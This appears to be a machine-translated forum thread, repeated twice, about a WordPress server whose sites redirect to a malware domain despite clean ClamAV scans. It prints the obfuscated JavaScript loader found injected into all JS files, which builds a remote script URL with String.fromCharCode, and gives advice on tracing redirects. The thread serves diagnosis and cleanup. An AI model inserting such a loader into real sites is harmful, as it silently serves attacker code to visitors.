WordPress 恶意软件 - 重定向到 (fast.destinyfernandi.com) - 即使在扫描和清理之后
WordPress Malware - Redirect to (fast.destinyfernandi.com) - even after scan and clean
我正在经历更糟糕的噩梦。我有一台 CentOS 服务器,它托管着 10 多个 WordPress 网站。
我的客户注意到他们的网站正在打开,加载后它被重定向到 (fast.destinyfernandi.com) <---- 恶意软件网站。
我使用 ClamAV 检测恶意软件并手动清除它们,但没有成功。
以下是其中一个网站的 Clamscan 命令结果示例:
----------- SCAN SUMMARY -----------
Known viruses: 6938202
Engine version: 0.101.5
Scanned directories: 2300
Scanned files: 91116
Infected files: 0
Data scanned: 4588.75 MB
Data read: 24121.63 MB (ratio 0.19:1)
Time: 1705.569 sec (28 m 25 s)
但此站点仍在重定向到该恶意软件网站。
有人遇到过这样的问题吗?
请帮忙。
==================================已解决:========= ====================
代码已注入所有js文件
var hglgfdrr4634hezfdg = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,116,111,109,46,118,101,114,121,98,101,97,116,105,102,117,108,97,110,116,111,110,121,46,99,111,109,47,97,46,106,115); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
有几种方法可以将您的网络资源重定向到 destinyfernandi。
- 数据库可以修补,您自己的合法代码也可以
重定向
- php 或 JS 或 html 模板中的某些注入代码确实如此
通过响应的 window.location 或元或 headers 重定向。
首先发现您被重定向到哪个地址,是 destinyfernandi 还是其他 URL。
我的意思是您可能会被重定向到某些 "invisible" URL1 和服务 URL1 的服务器会将浏览器进一步重定向到 destinyfernandi。
一旦您发现重定向中的第一跳 (URL) 是什么,您就可以在源代码和数据库转储中搜索错误 URL。
第一个跃点 URL(很可能是 destinyfernandi)也有可能在您的代码中被混淆,但希望不是这种情况。
您还可以添加在重定向时触发的断点,这可以帮助您识别混淆的 JS 代码:
window.addEventListener("beforeunload", function() { debugger; }, false)
我正在经历更糟糕的噩梦。我有一台 CentOS 服务器,它托管着 10 多个 WordPress 网站。
我的客户注意到他们的网站正在打开,加载后它被重定向到 (fast.destinyfernandi.com) <---- 恶意软件网站。
我使用 ClamAV 检测恶意软件并手动清除它们,但没有成功。
以下是其中一个网站的 Clamscan 命令结果示例:
----------- SCAN SUMMARY -----------
Known viruses: 6938202
Engine version: 0.101.5
Scanned directories: 2300
Scanned files: 91116
Infected files: 0
Data scanned: 4588.75 MB
Data read: 24121.63 MB (ratio 0.19:1)
Time: 1705.569 sec (28 m 25 s)
但此站点仍在重定向到该恶意软件网站。
有人遇到过这样的问题吗?
请帮忙。
==================================已解决:========= ====================
代码已注入所有js文件
var hglgfdrr4634hezfdg = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,116,111,109,46,118,101,114,121,98,101,97,116,105,102,117,108,97,110,116,111,110,121,46,99,111,109,47,97,46,106,115); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
有几种方法可以将您的网络资源重定向到 destinyfernandi。
- 数据库可以修补,您自己的合法代码也可以 重定向
- php 或 JS 或 html 模板中的某些注入代码确实如此 通过响应的 window.location 或元或 headers 重定向。
首先发现您被重定向到哪个地址,是 destinyfernandi 还是其他 URL。 我的意思是您可能会被重定向到某些 "invisible" URL1 和服务 URL1 的服务器会将浏览器进一步重定向到 destinyfernandi。
一旦您发现重定向中的第一跳 (URL) 是什么,您就可以在源代码和数据库转储中搜索错误 URL。
第一个跃点 URL(很可能是 destinyfernandi)也有可能在您的代码中被混淆,但希望不是这种情况。
您还可以添加在重定向时触发的断点,这可以帮助您识别混淆的 JS 代码:
window.addEventListener("beforeunload", function() { debugger; }, false)